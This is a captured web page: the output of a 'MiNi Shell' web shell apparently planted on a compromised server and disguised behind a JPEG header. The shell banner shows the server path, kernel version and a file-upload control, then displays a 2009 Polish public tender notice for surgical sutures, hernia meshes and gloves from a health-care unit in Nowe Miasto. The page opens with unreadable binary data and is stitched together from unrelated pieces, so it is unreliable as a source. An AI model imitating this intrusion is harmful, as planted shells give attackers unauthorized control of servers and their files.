JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/46670-N-2009.html

<p class="kh_header"><b>Nowe Miasto: Materiały medyczne - zadanie nr ... Nr. sprawy ZP, PN(  2    )2009 .Nie otwierać przed dniem 18.03. 2009 r godz. 10 00 .</b><br>
<b>Numer ogłoszenia: 46670 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Materiały medyczne - zadanie nr ... Nr. sprawy ZP, PN(  2    )2009 .Nie otwierać przed dniem 18.03. 2009 r godz. 10 00 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest zamówienie na dostawę  Materiałów 
   medycznych w postaci : Nici chirurgicznych, siatek przepuklinowych i rękawic
   chirurgicznych.
1.1.Przedmiot zamówienia podzielony został na 4 części. Każda ze wskazanych 
    części zamówienia określana będzie mianem (zadania).  
 1)zadanie nr 1 Nici chirurgiczne niewchłanialne oznaczenie wg Wspólnego Słownika
    Zamówień :  Kod CPV 33141121- 4 ,
 2)zadanie nr 2 Nici chirurgiczne wchłanialne oznaczenie wg Wspólnego Słownika 
    Zamówień :   Kod CPV 33141121- 4 ,
 3)zadanie nr 3 Siatki  przepuklinowe oznaczenie wg Wspólnego Słownika 
    Zamówień : Kod CPV 33141126- 9 ,
 4)zadanie nr 4 Rękawice chirurgiczne jednorazowego użytku oznaczenie wg 
    Wspólnego Słownika Zamówień : Kod CPV 33141420- 0.
2.Opis  przedmiotu zamówienia wymienionego w poz. 1.1.  i jego minimalna- 
   gwarantowana ilość  została określona w formularzach asortymentowo-
   cenowych - załączniki nr 3,4,5 i 6 SIWZ.
1)Przewidywane ilość przedmiotu zamówienia oszacowano na podstawie danych 
   zużycia z lat ubiegłych oraz najlepszej wiedzy zamawiającego co do potrzeb w 
   okresie realizacji zamówienia.
3.Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia w trakcie 
   realizacji umowy zakresu opisanego przedmiotu zamówienia  wyszczególnionego 
   w poszczególnych zadaniach w  granicach  + 10 %.  
 1).W przypadku zmniejszenia  ilości przedmiotu zamówienia  wykonawcy będzie 
     przysługiwać wynagrodzenie wynikające ze zrealizowanych dostaw .
 2) W przypadku zwiększenia ilości przedmiotu zamówienia wykonawcy 
    przysługiwać będzie  zwiększone wynagrodzenie przedmiotu zamówienia 
    obliczone po cenach wymienionych w formularzach asortymentowo
     -cenowych oferty.
4.Zamawiający dopuszcza  składanie ofert częściowych na poszczególne zadania. 
   Jednocześnie  zastrzega ,że jeden wykonawca może złożyć tylko jedną ofertę 
   częściową obejmującą dowolną liczbę   zadań.
5.W ramach pojedynczego zadania przedmiot zamówienia jest niepodzielny .
6.Zamawiający nie dopuszcza składanie ofert wariantowych i drogą elektroniczną ,
   o których mowa w  art.36 ust.2 pkt 4 i pkt 5 ustawy.
7.Zamawiający nie przewiduje zastosowania aukcji elektronicznej ,o której mowa w
   art.36 ust.2 pkt 7 ustawy.
8.Zamawiający  nie przewiduje zamówień uzupełniających ,o których mowa w art 
   67 ust 1 pkt 7 ustawy oraz podpisania umowy ramowej. 
9.Zamawiający dopuszcza składanie rozwiązań równoważnych o parametrach 
   techniczno  użytkowych nie  gorszych  niż podane w opisie przedmiotu 
   zamówienia.  Informacje i wymagania związane z dopuszczeniem rozwiązań 
   równoważnych  znajdują się w  opisie przedmiotu zamówienia .
10.W trakcie postępowania wykonawcy powinni traktować poszczególne zadania 
    jako oddzielne części-np. składając zapytanie ,protest należy wskazać jakiej 
    części  dotyczy. Zamawiający prowadząc postępowanie będzie   dokonywał 
    czynności  związanych w postępowaniu wskazując jakiej części dotyczy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.11.21-4, 33.14.11.26-9, 33.14.14.20-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami 
  fizycznymi, osobami  prawnymi lub jednostkami organizacyjnymi nie posiadającymi 
  osobowości prawnej, a także  wykonawcy Ci występujący wspólnie spełniający
  warunki określone w art 22 ust 1 pkt1-4,  ustawy z dnia 29 stycznia 2004 r oraz 
  Specyfikacji Istotnych Warunków Zamówienia szczególności : 
1) posiadają uprawnienia do wykonywania działalności  lub czynności określonej 
   przedmiotem zamówienia, jeżeli ustawy  nakładają posiadania takich uprawnień 
   oraz udokumentują to poprzez wykazanie posiadania  uprawnień do
   wykonywania działalności związanej z przedmiotem  niniejszego zamówienia 
   publicznego,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
   technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
   pisemne zobowiązanie innych przedmiotów do udostępnienia potencjału
   technicznego i osób zdolnych do wykonania zamówienia poprzez złożenia wykazu 
   wykonania co najmniej dwóch dostaw odpowiadających przedmiotowi zamówienia,
3) znajdują sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
   zamówienia dokumentując to poprzez złożenie polisy ubezpieczeniowej,
4) nie podlegają wykluczeniu  z postępowania o udzielenie zamówienia oraz 
   udokumentują to poprzez złożenie oświadczeń i informacji potwierdzających, że 
   Wykonawca nie podlega  wykluczeniu z postępowania o udzielenie zamówienia 
   publicznego . Spełnienie wymaganych warunków  będzie dokonane na podstawie
   sprawdzenia oferty pod względem formalno prawnym oraz załączonych pod 
   ofertę  dokumentów i oświadczeń  , o  których mowa  niniejszej SIWZ zgodnie z
   formułą   (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz ze złożoną ofertą wypełnioną na Formularzu ofertowym wg. wzoru 
   określonego w załączniku nr 2 SIWZ należy załączyć:
 a)Wypełniony i podpisany formularz asortymentowo-cenowy wg. wzoru 
    określonego w załączniku nr 3,4,5 lub 6 SIWZ (stosownie do zadania na które
    składa zamówienie)
 b)Oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust 1 i 
    art. 24 ust 1 i  2 ustawy wg. wzoru określonego w załączniku  nr 1  SIWZ (w 
    przypadku wykonawców ubiegających  się wspólnie o zamówienia ,każdy z 
    wykonawców jest zobowiązany złożyć ten dokument)
2.W celu potwierdzenia posiadania uprawnień  do wykonywania  działalności 
   określonej przedmiotem zmówienia  lub czynności wykonawcy winni złożyć 
   następujące dokumenty :
 a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
    ewidencji o działalności gospodarczej ,jeżeli odrębne  przepisy wymagają wpisu 
    do rejestru lub zgłoszenia do  ewidencji o działalności  gospodarczej
    wystawione nie wcześniej niż 6 m-cy  przed upływem   terminu składania ofert; 
    ( w przypadku wykonawców ubiegających się wspólnie o zamówienia ,każdy z  
     wykonawców jest zobowiązany złożyć ten dokument)
 b)Dla przedmiotu oferty kwalifikowanego jako wyrób medyczny - oryginał lub 
    kserokopię Rejestru produktu zamówienia i podmiotu odpowiedzialnego z za jego
    wprowadzenie do obrotu wydanego  przez Prezesa Urzędu Rejestracji Produktów 
    Leczniczych,  Wyrobów Medycznych i Produktów   Biobójczych  lub złożenia 
    kserokopii zgłoszenia przedmiotu zamówienia do Rejestru Wyrobów  Medycznych 
    zgodnie z ustawą, certyfikat CE ,deklarację zgodności lub inne równoważne  
    dokumenty, które potwierdziłyby  zgodnie z obowiązującymi  przepisami jakość
    produktu ;
  - w sytuacji gdy odpowiednie przepisy prawa wymagają, by potwierdzenie 
    spełniania norm czy wymogów jakościowych wydane było w ściśle określonej 
    formie, jej zachowanie jest konieczne.  Prosimy o oznaczenie, której pozycji 
    zadania dotyczą złożone dokumenty.
   c)Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w 
      imieniu Wykonawcy składającego ofertę , o ile nie wynikają z przepisów prawa 
      lub innych dokumentów. Pełnomocnictwo powinno być złożone w formie 
      oryginału lub kopii sporządzonej notarialnie. 
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
   Rzeczypospolitej Polskiej, stosuje się do przepisów   zawartych w Rozporządzeniu 
   Prezesa Rady Ministrów z dnia 19 maja  2008 r w sprawie rodzajów
   dokumentów jakich może żądać zamawiający od wykonawcy oraz  form w jakich
   dokumenty powinny być składane ( Dz. U. Nr 188 poz.1155)- składa: 
 - aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce 
    zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono  
    wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się takiego 
    dokumentu;
 - dokument zawierający oświadczenie złożone przed notariuszem,właściwym 
    organem sądowym, administracyjnym albo organem samorządu zawodowego 
    osoby lub kraju, w którym  wykonawca ma siedzibę lub miejsce zamieszkania;   
4.W celu potwierdzenia ,że wykonawca posiada niezbędną wiedzę
   doświadczenie, oraz dysponuje potencjałem technicznym i dysponuje osobami 
   zdolnymi do wykonania zamówienia , zamawiający    wymaga : 
a)wykazu wykonanych  w okresie nie dłuższym niż ostatnie trzy lata dostaw  
   odpowiadających  swoim rodzajem oraz  wartością dostawom stanowiącym 
   przedmiot zamówienia , z podaniem ich  wartości ,przedmiotu ,dat wykonania i
   odbiorców - załącznik  nr 9  SIWZ . Na potwierdzenie  niezbędnej wiedzy i 
   doświadczenia wykonawcy winni wykazać ,że w ciągu ostatnich trzech lat 
   wykonali co najmniej dwie dostawy w zakresie zadania  nr 3,4,5 i 6
   odpowiadające wartością i  zakresem niniejszemu zamówieniu. Do  wykazu należy
   załączyć  dokumenty potwierdzające ,że dostawy  zostały należycie  wykonane.
5.W celu potwierdzenia ,że wykonawca  znajduje się w sytuacji ekonomicznej i 
   finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga złożenia :
 a)ważnej kserokopii polisy ubezpieczeniowej , a w przypadku jej braku innego 
    dokumentu  ubezpieczenia   działalności gospodarczej w tym w zakresie
    przedmiotu zamówienia.  
6.Dokumenty, są składane w formie  oryginału, wypisu , odpisu lub kopii w języku  
   polskim lub przetłumaczone na język polski, stosownie do obowiązujących 
   przepisów.
7.Kserokopie dokumentów powinny być czytelne i potwierdzone za zgodność z 
   oryginałem przez wykonawcę lub osoby (ę) uprawnione (ą) do składania 
   oświadczeń woli w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> S. P. Zakład Opieki Zdrowotnej ul. Tomaszowska 43  26-420 Nowe-Miasto n.P po złożeniu wniosku i przelaniu opłaty na konto w Banku Spółdzielczym Belsk Duży nr 75 9116 0001 0001 4616 2000 0001.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 09:30, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Tomaszowska 43 26-420 Nowe-Miasto n.P. Budynek administracyjny - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com